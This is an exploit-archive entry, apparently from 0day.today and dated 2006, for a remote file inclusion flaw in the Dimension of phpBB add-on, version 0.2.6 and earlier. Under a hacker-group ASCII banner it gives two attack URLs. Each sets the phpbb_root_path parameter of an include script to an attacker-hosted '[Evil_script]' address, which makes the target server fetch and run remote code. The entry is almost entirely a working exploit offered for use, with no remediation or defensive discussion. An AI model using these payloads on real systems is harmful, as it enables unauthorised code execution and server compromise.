id: 927
date: 10/04/2006
title: Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes
author: SpiderZ
cves: 

==================================================================
Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes
==================================================================



_________________________________________________________________________


           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# Dimension of phpBB Remote File Inclusion Vulnerability
# For: Dimension of phpBB 0.2.5 (phpBB 2.0.21)
_________________________________________________________________________


# Remote File Inclusion

http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]


------------------------------------------------------------------------------



#  0day.today [2023-03-24]  #